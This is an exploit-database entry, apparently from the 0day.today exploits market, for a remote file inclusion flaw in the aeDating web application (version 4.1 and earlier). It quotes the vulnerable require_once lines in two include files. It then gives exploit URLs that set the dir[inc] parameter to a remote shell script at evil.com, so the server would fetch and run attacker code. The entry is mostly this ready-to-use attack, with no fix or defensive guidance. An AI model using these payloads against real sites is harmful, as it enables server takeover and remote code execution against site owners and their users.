[ authorization ] [ registration ] [ restore account ]
Contact us
You can contact us by:
0day Today Exploits Market and 0day Exploits Database

aeDating <= 4.1 dir[inc] Remote File Include Vulnerabilities

Author
NeXtMaN
Risk
[
Security Risk Unsored
]
0day-ID
0day-ID-843
Category
web applications
Date add
15-09-2006
Platform
unsorted
============================================================
aeDating <= 4.1 dir[inc] Remote File Include Vulnerabilities
============================================================



AEDating (all versions) Remote File inclusion.

Vulnerable code:

/inc/design.inc.php
/inc/admin_design.inc.php

require_once( "$dir[inc]db.inc.php" );
require_once( "$dir[inc]prof.inc.php" );

Exploit:
http://site.com/[script_path]/inc/design.inc.php?dir[inc]=http://evil.com/shell.txt?
http://site.com/[script_path]/inc/admin_design.inc.php?dir[inc]=http://evil.com/shell.txt ?



#  0day.today [2024-12-26]  #